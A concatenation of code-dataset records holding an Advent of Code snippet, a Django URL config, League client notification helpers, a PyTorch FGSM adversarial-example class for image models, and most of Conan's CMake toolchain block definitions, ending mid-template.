paths\ns=['-'.join(p) for p in pa]\nprint(len(set(s)))","repo_name":"piotrpodlaski/AoC","sub_path":"12/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10833385170","text":"from rest_framework import routers\nfrom rest_framework_jwt.views import obtain_jwt_token\n\nfrom django.urls import include, path\n\nfrom . import views\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'currency', views.CurrencyViewSet)\nrouter.register(r'currency_pair', views.CurrencyPairViewSet)\nrouter.register(r'user_balance', views.UserBalanceViewSet)\nrouter.register(r'order', views.OrderViewSet)\nrouter.register(r'trade', views.TradeViewSet)\n\nurlpatterns = [\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n path('token-auth/', obtain_jwt_token)\n]\n","repo_name":"aleclara95/test-exchange-be","sub_path":"apps/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24452930605","text":"''' Module for notifications related tasks '''\nimport asyncio\n\nfrom connection.league import LeagueConnection\n\n\nasync def delete_lb_notification(connection: LeagueConnection):\n ''' Deletes leaverbuster notification '''\n future = connection.async_delete('/lol-leaver-buster/v1/notifications/1')\n await asyncio.sleep(0)\n future.result()\n\n\nasync def post_honor_ack(connection: LeagueConnection):\n ''' Posts honor ack '''\n future = connection.async_post('/lol-honor-v2/v1/level-change/ack')\n await asyncio.sleep(0)\n future.result()\n","repo_name":"pradishb/auto-disenchanter","sub_path":"client/notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"73490685370","text":"import os\nproject_index = os.getcwd().find('AdversialExamples')\nroot = os.getcwd()[0:project_index] + 'AdversialExamples'\nimport sys\nsys.path.append(root)\nimport torch\nimport torch.nn.functional as F\nfrom model.CNNModel import CNN_model\nfrom tartgetdata.GetData import dataloaders\nfrom utils.vis 
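# The AoC day-12 snippet above threads global counters and deepcopied sets
# through its recursion, then dedups double-counted paths at the end. The same
# cave-counting idea in a self-contained sketch, with the "one small cave may
# be visited twice" allowance carried as a boolean instead; the example graph
# below is illustrative, not the puzzle input.
def count_paths(edges, allow_twice=False):
    graph = {}
    for a, b in edges:
        graph.setdefault(a, []).append(b)
        graph.setdefault(b, []).append(a)

    def dfs(node, visited, twice_used):
        if node == "end":
            return 1
        if node.islower():
            visited = visited | {node}       # small caves are tracked, big ones not
        total = 0
        for nxt in graph[node]:
            if nxt == "start":
                continue
            if nxt in visited:
                if twice_used or not allow_twice:
                    continue
                total += dfs(nxt, visited, True)   # spend the single revisit
            else:
                total += dfs(nxt, visited, twice_used)
        return total

    return dfs("start", frozenset(), False)

# Usage on a toy graph:
edges = [("start", "A"), ("start", "b"), ("A", "c"), ("A", "b"),
         ("b", "d"), ("A", "end"), ("b", "end")]
print(count_paths(edges))          # part 1: each small cave at most once
print(count_paths(edges, True))    # part 2: one small cave may be visited twice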
import batch_show\n\n\n\n\nclass Attack(object):\n def __init__(self, target_net, attack_type='FGSM', criterion_func=F.cross_entropy):\n \"\"\"\n 攻击目标网络生成样本\n :param target_net: 攻击的目标网络,需要有attribute name\n :param attack_type:\n :param criterion_func:\n \"\"\"\n self.target_net = target_net\n self.attack_type = attack_type\n self.creterion_func = criterion_func\n\n def fgsm_attack(self, x, hx, ifdodge=False, epsilon=0.5, x_min=-1, x_max=1):\n assert self.target_net.name == 'resnet18', ValueError(\"This model isn't supported yet!\")\n x = x.clone().detach().requires_grad_(True)\n output = self.target_net(x)\n loss = -self.creterion_func(output, hx) if ifdodge else self.creterion_func(output, hx)\n self.target_net.zero_grad()\n loss.backward()\n pertubation = epsilon * x.grad.sign_()\n return torch.clamp(x + pertubation, x_min, x_max)\n\n def ifgsm_attack(self, x, hx, ifdodge=False, epsilon=0.5, ):\n pass\n\n\n\n\nif __name__ == '__main__':\n at = Attack(CNN_model)\n inp, label = next(iter(dataloaders['train']))\n res = at.attack(inp, label)\n batch_show(res.detach(), label)\n","repo_name":"JerryMazeyu/AdversialExamples","sub_path":"model/Attack.py","file_name":"Attack.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31841483665","text":"import os\nimport re\nimport textwrap\nfrom collections import OrderedDict\n\nfrom jinja2 import Template\n\nfrom conan.tools.apple.apple import get_apple_sdk_fullname\nfrom conan.tools.android.utils import android_abi\nfrom conan.tools.apple.apple import is_apple_os, to_apple_arch\nfrom conan.tools.build import build_jobs\nfrom conan.tools.build.flags import architecture_flag, libcxx_flags\nfrom conan.tools.build.cross_building import cross_building\nfrom conan.tools.cmake.toolchain import CONAN_TOOLCHAIN_FILENAME\nfrom conan.tools.intel import IntelCC\nfrom conan.tools.microsoft.visual import msvc_version_to_toolset_version\nfrom conans.client.subsystems import deduce_subsystem, WINDOWS\nfrom conan.errors import ConanException\nfrom conans.util.files import load\n\n\nclass Block(object):\n def __init__(self, conanfile, toolchain):\n self._conanfile = conanfile\n self._toolchain = toolchain\n self._context_values = None\n\n @property\n def values(self):\n if self._context_values is None:\n self._context_values = self.context()\n return self._context_values\n\n @values.setter\n def values(self, context_values):\n self._context_values = context_values\n\n def get_rendered_content(self):\n context = self.values\n if context is None:\n return\n\n def cmake_value(value):\n if isinstance(value, bool):\n return \"ON\" if value else \"OFF\"\n else:\n return '\"{}\"'.format(value)\n\n template = Template(self.template, trim_blocks=True, lstrip_blocks=True)\n template.environment.filters[\"cmake_value\"] = cmake_value\n return template.render(**context)\n\n def context(self):\n return {}\n\n @property\n def template(self):\n raise NotImplementedError()\n\n\nclass VSRuntimeBlock(Block):\n template = textwrap.dedent(\"\"\"\n # Definition of VS runtime, defined from build_type, compiler.runtime, compiler.runtime_type\n {% set genexpr = namespace(str='') %}\n {% for config, value in vs_runtimes.items() %}\n {% set genexpr.str = genexpr.str +\n '$<$:' + value|string + '>' %}\n {% endfor %}\n cmake_policy(GET CMP0091 POLICY_CMP0091)\n if(NOT \"${POLICY_CMP0091}\" STREQUAL NEW)\n message(FATAL_ERROR \"The CMake policy CMP0091 must be NEW, but is '${POLICY_CMP0091}'\")\n 
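# Two rough edges in the Attack record above: ifgsm_attack is an empty stub
# (`pass`), and the __main__ block calls at.attack(inp, label), a method the
# class never defines (fgsm_attack was likely intended). A minimal iterative
# FGSM (BIM) sketch under the same assumptions -- `net` is any classifier and
# the step size / clipping bounds below are illustrative defaults:
import torch
import torch.nn.functional as F

def ifgsm_attack(net, x, y, steps=10, epsilon=0.03, x_min=-1.0, x_max=1.0):
    x_adv = x.clone().detach()
    for _ in range(steps):
        x_adv.requires_grad_(True)
        loss = F.cross_entropy(net(x_adv), y)
        net.zero_grad()
        loss.backward()
        # one signed-gradient step, then clip back into the valid pixel range
        x_adv = (x_adv + epsilon * x_adv.grad.sign()).clamp(x_min, x_max)
        x_adv = x_adv.detach()   # cut the graph before the next iteration
    return x_adv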
endif()\n set(CMAKE_MSVC_RUNTIME_LIBRARY \"{{ genexpr.str }}\")\n \"\"\")\n\n def context(self):\n # Parsing existing toolchain file to get existing configured runtimes\n settings = self._conanfile.settings\n if settings.get_safe(\"os\") != \"Windows\":\n return\n\n compiler = settings.get_safe(\"compiler\")\n if compiler not in (\"msvc\", \"clang\", \"intel-cc\"):\n return\n\n runtime = settings.get_safe(\"compiler.runtime\")\n if runtime is None:\n return\n\n config_dict = {}\n if os.path.exists(CONAN_TOOLCHAIN_FILENAME):\n existing_include = load(CONAN_TOOLCHAIN_FILENAME)\n msvc_runtime_value = re.search(r\"set\\(CMAKE_MSVC_RUNTIME_LIBRARY \\\"([^)]*)\\\"\\)\",\n existing_include)\n if msvc_runtime_value:\n capture = msvc_runtime_value.group(1)\n matches = re.findall(r\"\\$<\\$:([A-Za-z]*)>\", capture)\n config_dict = dict(matches)\n\n build_type = settings.get_safe(\"build_type\") # FIXME: change for configuration\n if build_type is None:\n return None\n\n if compiler == \"msvc\" or compiler == \"intel-cc\" or compiler == \"clang\":\n runtime_type = settings.get_safe(\"compiler.runtime_type\")\n rt = \"MultiThreadedDebug\" if runtime_type == \"Debug\" else \"MultiThreaded\"\n if runtime != \"static\":\n rt += \"DLL\"\n config_dict[build_type] = rt\n\n # If clang is being used the CMake check of compiler will try to create a simple\n # test application, and will fail because the Debug runtime is not there\n if compiler == \"clang\":\n if config_dict.get(\"Debug\") is None:\n clang_rt = \"MultiThreadedDebug\" + (\"DLL\" if runtime != \"static\" else \"\")\n config_dict[\"Debug\"] = clang_rt\n\n return {\"vs_runtimes\": config_dict}\n\n\nclass FPicBlock(Block):\n template = textwrap.dedent(\"\"\"\n {% if fpic %}\n message(STATUS \"Conan toolchain: Setting CMAKE_POSITION_INDEPENDENT_CODE={{ fpic }} (options.fPIC)\")\n set(CMAKE_POSITION_INDEPENDENT_CODE {{ fpic }} CACHE BOOL \"Position independent code\")\n {% endif %}\n \"\"\")\n\n def context(self):\n fpic = self._conanfile.options.get_safe(\"fPIC\")\n if fpic is None:\n return None\n os_ = self._conanfile.settings.get_safe(\"os\")\n if os_ and \"Windows\" in os_:\n self._conanfile.output.warning(\"Toolchain: Ignoring fPIC option defined for Windows\")\n return None\n return {\"fpic\": \"ON\" if fpic else \"OFF\"}\n\n\nclass GLibCXXBlock(Block):\n template = textwrap.dedent(\"\"\"\n {% if set_libcxx %}\n string(APPEND CONAN_CXX_FLAGS \" {{ set_libcxx }}\")\n {% endif %}\n {% if glibcxx %}\n add_compile_definitions({{ glibcxx }})\n {% endif %}\n \"\"\")\n\n def context(self):\n libcxx, stdlib11 = libcxx_flags(self._conanfile)\n return {\"set_libcxx\": libcxx, \"glibcxx\": stdlib11}\n\n\nclass SkipRPath(Block):\n template = textwrap.dedent(\"\"\"\n {% if skip_rpath %}\n set(CMAKE_SKIP_RPATH 1 CACHE BOOL \"rpaths\" FORCE)\n # Policy CMP0068\n # We want the old behavior, in CMake >= 3.9 CMAKE_SKIP_RPATH won't affect install_name in OSX\n set(CMAKE_INSTALL_NAME_DIR \"\")\n {% endif %}\n \"\"\")\n\n skip_rpath = False\n\n def context(self):\n return {\"skip_rpath\": self.skip_rpath}\n\n\nclass ArchitectureBlock(Block):\n template = textwrap.dedent(\"\"\"\n string(APPEND CONAN_CXX_FLAGS \" {{ arch_flag }}\")\n string(APPEND CONAN_C_FLAGS \" {{ arch_flag }}\")\n string(APPEND CONAN_SHARED_LINKER_FLAGS \" {{ arch_flag }}\")\n string(APPEND CONAN_EXE_LINKER_FLAGS \" {{ arch_flag }}\")\n \"\"\")\n\n def context(self):\n arch_flag = architecture_flag(self._conanfile.settings)\n if not arch_flag:\n return\n return {\"arch_flag\": 
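# The VSRuntimeBlock template and regex above appear to have lost their
# '<CONFIG:' fragments (likely stripped as HTML-like tags during extraction):
# upstream Conan emits generator expressions of the form
# $<$<CONFIG:cfg>:runtime> and parses them back with two capture groups. A
# standalone Jinja2 sketch of what the intact template renders to, with
# illustrative runtime values:
from jinja2 import Template
import textwrap

tpl = textwrap.dedent("""\
    {% set genexpr = namespace(str='') %}
    {% for config, value in vs_runtimes.items() %}
    {% set genexpr.str = genexpr.str + '$<$<CONFIG:' + config + '>:' + value|string + '>' %}
    {% endfor %}
    set(CMAKE_MSVC_RUNTIME_LIBRARY "{{ genexpr.str }}")""")

out = Template(tpl, trim_blocks=True, lstrip_blocks=True).render(
    vs_runtimes={"Release": "MultiThreadedDLL", "Debug": "MultiThreadedDebugDLL"})
print(out)
# -> set(CMAKE_MSVC_RUNTIME_LIBRARY
#        "$<$<CONFIG:Release>:MultiThreadedDLL>$<$<CONFIG:Debug>:MultiThreadedDebugDLL>")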
arch_flag}\n\n\nclass LinkerScriptsBlock(Block):\n template = textwrap.dedent(\"\"\"\n string(APPEND CONAN_EXE_LINKER_FLAGS {{ linker_script_flags }})\n \"\"\")\n\n def context(self):\n linker_scripts = self._conanfile.conf.get(\n \"tools.build:linker_scripts\", check_type=list, default=[])\n if not linker_scripts:\n return\n linker_scripts = [linker_script.replace('\\\\', '/') for linker_script in linker_scripts]\n linker_script_flags = ['-T\"' + linker_script + '\"' for linker_script in linker_scripts]\n return {\"linker_script_flags\": \" \".join(linker_script_flags)}\n\n\nclass CppStdBlock(Block):\n template = textwrap.dedent(\"\"\"\n message(STATUS \"Conan toolchain: C++ Standard {{ cppstd }} with extensions {{ cppstd_extensions }}\")\n set(CMAKE_CXX_STANDARD {{ cppstd }})\n set(CMAKE_CXX_EXTENSIONS {{ cppstd_extensions }})\n set(CMAKE_CXX_STANDARD_REQUIRED ON)\n \"\"\")\n\n def context(self):\n compiler_cppstd = self._conanfile.settings.get_safe(\"compiler.cppstd\")\n if compiler_cppstd is None:\n return None\n\n if compiler_cppstd.startswith(\"gnu\"):\n cppstd = compiler_cppstd[3:]\n cppstd_extensions = \"ON\"\n else:\n cppstd = compiler_cppstd\n cppstd_extensions = \"OFF\"\n return {\"cppstd\": cppstd, \"cppstd_extensions\": cppstd_extensions}\n\n\nclass SharedLibBock(Block):\n template = textwrap.dedent(\"\"\"\n message(STATUS \"Conan toolchain: Setting BUILD_SHARED_LIBS = {{ shared_libs }}\")\n set(BUILD_SHARED_LIBS {{ shared_libs }} CACHE BOOL \"Build shared libraries\")\n \"\"\")\n\n def context(self):\n try:\n shared_libs = \"ON\" if self._conanfile.options.shared else \"OFF\"\n return {\"shared_libs\": shared_libs}\n except ConanException:\n return None\n\n\nclass ParallelBlock(Block):\n template = textwrap.dedent(\"\"\"\n string(APPEND CONAN_CXX_FLAGS \" /MP{{ parallel }}\")\n string(APPEND CONAN_C_FLAGS \" /MP{{ parallel }}\")\n \"\"\")\n\n def context(self):\n # TODO: Check this conf\n\n compiler = self._conanfile.settings.get_safe(\"compiler\")\n if compiler != \"msvc\" or \"Visual\" not in self._toolchain.generator:\n return\n\n jobs = build_jobs(self._conanfile)\n if jobs:\n return {\"parallel\": jobs}\n\n\nclass AndroidSystemBlock(Block):\n\n template = textwrap.dedent(\"\"\"\n # New toolchain things\n set(ANDROID_PLATFORM {{ android_platform }})\n {% if android_stl %}\n set(ANDROID_STL {{ android_stl }})\n {% endif %}\n set(ANDROID_ABI {{ android_abi }})\n {% if android_use_legacy_toolchain_file %}\n set(ANDROID_USE_LEGACY_TOOLCHAIN_FILE {{ android_use_legacy_toolchain_file }})\n {% endif %}\n include({{ android_ndk_path }}/build/cmake/android.toolchain.cmake)\n \"\"\")\n\n def context(self):\n os_ = self._conanfile.settings.get_safe(\"os\")\n if os_ != \"Android\":\n return\n\n # TODO: only 'c++_shared' y 'c++_static' supported?\n # https://developer.android.com/ndk/guides/cpp-support\n libcxx_str = self._conanfile.settings.get_safe(\"compiler.libcxx\")\n\n android_ndk_path = self._conanfile.conf.get(\"tools.android:ndk_path\")\n if not android_ndk_path:\n raise ConanException('CMakeToolchain needs tools.android:ndk_path configuration defined')\n android_ndk_path = android_ndk_path.replace(\"\\\\\", \"/\")\n\n use_cmake_legacy_toolchain = self._conanfile.conf.get(\"tools.android:cmake_legacy_toolchain\",\n check_type=bool)\n if use_cmake_legacy_toolchain is not None:\n use_cmake_legacy_toolchain = \"ON\" if use_cmake_legacy_toolchain else \"OFF\"\n\n ctxt_toolchain = {\n 'android_platform': 'android-' + str(self._conanfile.settings.os.api_level),\n 'android_abi': 
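# CppStdBlock above derives the CMake standard from compiler.cppstd by
# stripping a "gnu" prefix; a quick check of that mapping in isolation:
def cmake_cppstd(compiler_cppstd):
    if compiler_cppstd.startswith("gnu"):
        return compiler_cppstd[3:], "ON"     # GNU dialect -> extensions ON
    return compiler_cppstd, "OFF"

assert cmake_cppstd("gnu17") == ("17", "ON")
assert cmake_cppstd("20") == ("20", "OFF")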
android_abi(self._conanfile),\n 'android_stl': libcxx_str,\n 'android_ndk_path': android_ndk_path,\n 'android_use_legacy_toolchain_file': use_cmake_legacy_toolchain,\n }\n return ctxt_toolchain\n\n\nclass AppleSystemBlock(Block):\n template = textwrap.dedent(\"\"\"\n # Set the architectures for which to build.\n set(CMAKE_OSX_ARCHITECTURES {{ cmake_osx_architectures }} CACHE STRING \"\" FORCE)\n # Setting CMAKE_OSX_SYSROOT SDK, when using Xcode generator the name is enough\n # but full path is necessary for others\n set(CMAKE_OSX_SYSROOT {{ cmake_osx_sysroot }} CACHE STRING \"\" FORCE)\n {% if cmake_osx_deployment_target is defined %}\n # Setting CMAKE_OSX_DEPLOYMENT_TARGET if \"os.version\" is defined by the used conan profile\n set(CMAKE_OSX_DEPLOYMENT_TARGET \"{{ cmake_osx_deployment_target }}\" CACHE STRING \"\")\n {% endif %}\n set(BITCODE \"\")\n set(FOBJC_ARC \"\")\n set(VISIBILITY \"\")\n {% if enable_bitcode %}\n # Bitcode ON\n set(CMAKE_XCODE_ATTRIBUTE_ENABLE_BITCODE \"YES\")\n set(CMAKE_XCODE_ATTRIBUTE_BITCODE_GENERATION_MODE \"bitcode\")\n {% if enable_bitcode_marker %}\n set(BITCODE \"-fembed-bitcode-marker\")\n {% else %}\n set(BITCODE \"-fembed-bitcode\")\n {% endif %}\n {% elif enable_bitcode is not none %}\n # Bitcode OFF\n set(CMAKE_XCODE_ATTRIBUTE_ENABLE_BITCODE \"NO\")\n {% endif %}\n {% if enable_arc %}\n # ARC ON\n set(FOBJC_ARC \"-fobjc-arc\")\n set(CMAKE_XCODE_ATTRIBUTE_CLANG_ENABLE_OBJC_ARC \"YES\")\n {% elif enable_arc is not none %}\n # ARC OFF\n set(FOBJC_ARC \"-fno-objc-arc\")\n set(CMAKE_XCODE_ATTRIBUTE_CLANG_ENABLE_OBJC_ARC \"NO\")\n {% endif %}\n {% if enable_visibility %}\n # Visibility ON\n set(CMAKE_XCODE_ATTRIBUTE_GCC_SYMBOLS_PRIVATE_EXTERN \"NO\")\n set(VISIBILITY \"-fvisibility=default\")\n {% elif enable_visibility is not none %}\n # Visibility OFF\n set(VISIBILITY \"-fvisibility=hidden -fvisibility-inlines-hidden\")\n set(CMAKE_XCODE_ATTRIBUTE_GCC_SYMBOLS_PRIVATE_EXTERN \"YES\")\n {% endif %}\n #Check if Xcode generator is used, since that will handle these flags automagically\n if(CMAKE_GENERATOR MATCHES \"Xcode\")\n message(DEBUG \"Not setting any manual command-line buildflags, since Xcode is selected as generator.\")\n else()\n string(APPEND CONAN_C_FLAGS \" ${BITCODE} ${FOBJC_ARC}\")\n string(APPEND CONAN_CXX_FLAGS \" ${BITCODE} ${VISIBILITY} ${FOBJC_ARC}\")\n endif()\n \"\"\")\n\n def context(self):\n if not is_apple_os(self._conanfile):\n return None\n\n # check valid combinations of architecture - os ?\n # for iOS a FAT library valid for simulator and device can be generated\n # if multiple archs are specified \"-DCMAKE_OSX_ARCHITECTURES=armv7;armv7s;arm64;i386;x86_64\"\n host_architecture = to_apple_arch(self._conanfile)\n\n host_os_version = self._conanfile.settings.get_safe(\"os.version\")\n host_sdk_name = self._conanfile.conf.get(\"tools.apple:sdk_path\") or get_apple_sdk_fullname(self._conanfile)\n is_debug = self._conanfile.settings.get_safe('build_type') == \"Debug\"\n\n # Reading some configurations to enable or disable some Xcode toolchain flags and variables\n # Issue related: https://github.com/conan-io/conan/issues/9448\n # Based on https://github.com/leetal/ios-cmake repository\n enable_bitcode = self._conanfile.conf.get(\"tools.apple:enable_bitcode\", check_type=bool)\n enable_arc = self._conanfile.conf.get(\"tools.apple:enable_arc\", check_type=bool)\n enable_visibility = self._conanfile.conf.get(\"tools.apple:enable_visibility\", check_type=bool)\n\n ctxt_toolchain = {\n \"enable_bitcode\": enable_bitcode,\n 
\"enable_bitcode_marker\": all([enable_bitcode, is_debug]),\n \"enable_arc\": enable_arc,\n \"enable_visibility\": enable_visibility\n }\n if host_sdk_name:\n ctxt_toolchain[\"cmake_osx_sysroot\"] = host_sdk_name\n # this is used to initialize the OSX_ARCHITECTURES property on each target as it is created\n if host_architecture:\n ctxt_toolchain[\"cmake_osx_architectures\"] = host_architecture\n\n if host_os_version:\n # https://cmake.org/cmake/help/latest/variable/CMAKE_OSX_DEPLOYMENT_TARGET.html\n # Despite the OSX part in the variable name(s) they apply also to other SDKs than\n # macOS like iOS, tvOS, watchOS or visionOS.\n ctxt_toolchain[\"cmake_osx_deployment_target\"] = host_os_version\n\n return ctxt_toolchain\n\n\nclass FindFiles(Block):\n template = textwrap.dedent(\"\"\"\n {% if find_package_prefer_config %}\n set(CMAKE_FIND_PACKAGE_PREFER_CONFIG {{ find_package_prefer_config }})\n {% endif %}\n\n # Definition of CMAKE_MODULE_PATH\n {% if build_paths %}\n list(PREPEND CMAKE_MODULE_PATH {{ build_paths }})\n {% endif %}\n {% if generators_folder %}\n # the generators folder (where conan generates files, like this toolchain)\n list(PREPEND CMAKE_MODULE_PATH {{ generators_folder }})\n {% endif %}\n\n # Definition of CMAKE_PREFIX_PATH, CMAKE_XXXXX_PATH\n {% if build_paths %}\n # The explicitly defined \"builddirs\" of \"host\" context dependencies must be in PREFIX_PATH\n list(PREPEND CMAKE_PREFIX_PATH {{ build_paths }})\n {% endif %}\n {% if generators_folder %}\n # The Conan local \"generators\" folder, where this toolchain is saved.\n list(PREPEND CMAKE_PREFIX_PATH {{ generators_folder }} )\n {% endif %}\n {% if cmake_program_path %}\n list(PREPEND CMAKE_PROGRAM_PATH {{ cmake_program_path }})\n {% endif %}\n {% if cmake_library_path %}\n list(PREPEND CMAKE_LIBRARY_PATH {{ cmake_library_path }})\n {% endif %}\n {% if is_apple and cmake_framework_path %}\n list(PREPEND CMAKE_FRAMEWORK_PATH {{ cmake_framework_path }})\n {% endif %}\n {% if cmake_include_path %}\n list(PREPEND CMAKE_INCLUDE_PATH {{ cmake_include_path }})\n {% endif %}\n\n {% if cross_building %}\n if(NOT DEFINED CMAKE_FIND_ROOT_PATH_MODE_PACKAGE OR CMAKE_FIND_ROOT_PATH_MODE_PACKAGE STREQUAL \"ONLY\")\n set(CMAKE_FIND_ROOT_PATH_MODE_PACKAGE \"BOTH\")\n endif()\n if(NOT DEFINED CMAKE_FIND_ROOT_PATH_MODE_PROGRAM OR CMAKE_FIND_ROOT_PATH_MODE_PROGRAM STREQUAL \"ONLY\")\n set(CMAKE_FIND_ROOT_PATH_MODE_PROGRAM \"BOTH\")\n endif()\n if(NOT DEFINED CMAKE_FIND_ROOT_PATH_MODE_LIBRARY OR CMAKE_FIND_ROOT_PATH_MODE_LIBRARY STREQUAL \"ONLY\")\n set(CMAKE_FIND_ROOT_PATH_MODE_LIBRARY \"BOTH\")\n endif()\n {% if is_apple %}\n if(NOT DEFINED CMAKE_FIND_ROOT_PATH_MODE_FRAMEWORK OR CMAKE_FIND_ROOT_PATH_MODE_FRAMEWORK STREQUAL \"ONLY\")\n set(CMAKE_FIND_ROOT_PATH_MODE_FRAMEWORK \"BOTH\")\n endif()\n {% endif %}\n if(NOT DEFINED CMAKE_FIND_ROOT_PATH_MODE_INCLUDE OR CMAKE_FIND_ROOT_PATH_MODE_INCLUDE STREQUAL \"ONLY\")\n set(CMAKE_FIND_ROOT_PATH_MODE_INCLUDE \"BOTH\")\n endif()\n {% endif %}\n \"\"\")\n\n @staticmethod\n def _join_paths(paths):\n return \" \".join(['\"{}\"'.format(p.replace('\\\\', '/')\n .replace('$', '\\\\$')\n .replace('\"', '\\\\\"')) for p in paths])\n\n def context(self):\n # To find the generated cmake_find_package finders\n # TODO: Change this for parameterized output location of CMakeDeps\n find_package_prefer_config = \"ON\" # assume ON by default if not specified in conf\n prefer_config = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:find_package_prefer_config\",\n check_type=bool)\n if prefer_config is 
False:\n find_package_prefer_config = \"OFF\"\n\n is_apple_ = is_apple_os(self._conanfile)\n\n # Read information from host context\n # TODO: Add here in 2.0 the \"skip\": False trait\n host_req = self._conanfile.dependencies.filter({\"build\": False}).values()\n build_paths = []\n host_lib_paths = []\n host_framework_paths = []\n host_include_paths = []\n for req in host_req:\n cppinfo = req.cpp_info.aggregated_components()\n build_paths.extend(cppinfo.builddirs)\n host_lib_paths.extend(cppinfo.libdirs)\n if is_apple_:\n host_framework_paths.extend(cppinfo.frameworkdirs)\n host_include_paths.extend(cppinfo.includedirs)\n\n # Read information from build context\n build_req = self._conanfile.dependencies.build.values()\n build_bin_paths = []\n for req in build_req:\n cppinfo = req.cpp_info.aggregated_components()\n build_paths.extend(cppinfo.builddirs)\n build_bin_paths.extend(cppinfo.bindirs)\n\n return {\n \"find_package_prefer_config\": find_package_prefer_config,\n \"generators_folder\": \"${CMAKE_CURRENT_LIST_DIR}\",\n \"build_paths\": self._join_paths(build_paths),\n \"cmake_program_path\": self._join_paths(build_bin_paths),\n \"cmake_library_path\": self._join_paths(host_lib_paths),\n \"cmake_framework_path\": self._join_paths(host_framework_paths),\n \"cmake_include_path\": self._join_paths(host_include_paths),\n \"is_apple\": is_apple_,\n \"cross_building\": cross_building(self._conanfile),\n }\n\n\nclass PkgConfigBlock(Block):\n template = textwrap.dedent(\"\"\"\n {% if pkg_config %}\n set(PKG_CONFIG_EXECUTABLE {{ pkg_config }} CACHE FILEPATH \"pkg-config executable\")\n {% endif %}\n {% if pkg_config_path %}\n if (DEFINED ENV{PKG_CONFIG_PATH})\n set(ENV{PKG_CONFIG_PATH} \"{{ pkg_config_path }}$ENV{PKG_CONFIG_PATH}\")\n else()\n set(ENV{PKG_CONFIG_PATH} \"{{ pkg_config_path }}\")\n endif()\n {% endif %}\n \"\"\")\n\n def context(self):\n pkg_config = self._conanfile.conf.get(\"tools.gnu:pkg_config\", check_type=str)\n if pkg_config:\n pkg_config = pkg_config.replace(\"\\\\\", \"/\")\n subsystem = deduce_subsystem(self._conanfile, \"build\")\n pathsep = \":\" if subsystem != WINDOWS else \";\"\n pkg_config_path = \"${CMAKE_CURRENT_LIST_DIR}\" + pathsep\n return {\"pkg_config\": pkg_config,\n \"pkg_config_path\": pkg_config_path}\n\n\nclass UserToolchain(Block):\n template = textwrap.dedent(\"\"\"\n {% for user_toolchain in paths %}\n include(\"{{user_toolchain}}\")\n {% endfor %}\n \"\"\")\n\n def context(self):\n # This is global [conf] injection of extra toolchain files\n user_toolchain = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:user_toolchain\",\n default=[], check_type=list)\n return {\"paths\": [ut.replace(\"\\\\\", \"/\") for ut in user_toolchain]}\n\n\nclass ExtraFlagsBlock(Block):\n \"\"\"This block is adding flags directly from user [conf] section\"\"\"\n\n template = textwrap.dedent(\"\"\"\n # Extra c, cxx, linkflags and defines\n {% if cxxflags %}\n string(APPEND CONAN_CXX_FLAGS \"{% for cxxflag in cxxflags %} {{ cxxflag }}{% endfor %}\")\n {% endif %}\n {% if cflags %}\n string(APPEND CONAN_C_FLAGS \"{% for cflag in cflags %} {{ cflag }}{% endfor %}\")\n {% endif %}\n {% if sharedlinkflags %}\n string(APPEND CONAN_SHARED_LINKER_FLAGS \"{% for sharedlinkflag in sharedlinkflags %} {{ sharedlinkflag }}{% endfor %}\")\n {% endif %}\n {% if exelinkflags %}\n string(APPEND CONAN_EXE_LINKER_FLAGS \"{% for exelinkflag in exelinkflags %} {{ exelinkflag }}{% endfor %}\")\n {% endif %}\n {% if defines %}\n add_compile_definitions({% for define in defines %} \"{{ 
define }}\"{% endfor %})\n {% endif %}\n \"\"\")\n\n def context(self):\n # Now, it's time to get all the flags defined by the user\n cxxflags = self._toolchain.extra_cxxflags + self._conanfile.conf.get(\"tools.build:cxxflags\", default=[], check_type=list)\n cflags = self._toolchain.extra_cflags + self._conanfile.conf.get(\"tools.build:cflags\", default=[], check_type=list)\n sharedlinkflags = self._toolchain.extra_sharedlinkflags + self._conanfile.conf.get(\"tools.build:sharedlinkflags\", default=[], check_type=list)\n exelinkflags = self._toolchain.extra_exelinkflags + self._conanfile.conf.get(\"tools.build:exelinkflags\", default=[], check_type=list)\n defines = self._conanfile.conf.get(\"tools.build:defines\", default=[], check_type=list)\n\n # See https://github.com/conan-io/conan/issues/13374\n android_ndk_path = self._conanfile.conf.get(\"tools.android:ndk_path\")\n android_legacy_toolchain = self._conanfile.conf.get(\"tools.android:cmake_legacy_toolchain\",\n check_type=bool)\n if android_ndk_path and (cxxflags or cflags) and android_legacy_toolchain is not False:\n self._conanfile.output.warning(\"tools.build:cxxflags or cflags are defined, but Android NDK toolchain may be overriding \"\n \"the values. Consider setting tools.android:cmake_legacy_toolchain to False.\")\n\n return {\n \"cxxflags\": cxxflags,\n \"cflags\": cflags,\n \"sharedlinkflags\": sharedlinkflags,\n \"exelinkflags\": exelinkflags,\n \"defines\": [define.replace('\"', '\\\\\"') for define in defines]\n }\n\n\nclass CMakeFlagsInitBlock(Block):\n template = textwrap.dedent(\"\"\"\n if(DEFINED CONAN_CXX_FLAGS)\n string(APPEND CMAKE_CXX_FLAGS_INIT \" ${CONAN_CXX_FLAGS}\")\n endif()\n if(DEFINED CONAN_C_FLAGS)\n string(APPEND CMAKE_C_FLAGS_INIT \" ${CONAN_C_FLAGS}\")\n endif()\n if(DEFINED CONAN_SHARED_LINKER_FLAGS)\n string(APPEND CMAKE_SHARED_LINKER_FLAGS_INIT \" ${CONAN_SHARED_LINKER_FLAGS}\")\n endif()\n if(DEFINED CONAN_EXE_LINKER_FLAGS)\n string(APPEND CMAKE_EXE_LINKER_FLAGS_INIT \" ${CONAN_EXE_LINKER_FLAGS}\")\n endif()\n \"\"\")\n\n\nclass TryCompileBlock(Block):\n template = textwrap.dedent(\"\"\"\n get_property( _CMAKE_IN_TRY_COMPILE GLOBAL PROPERTY 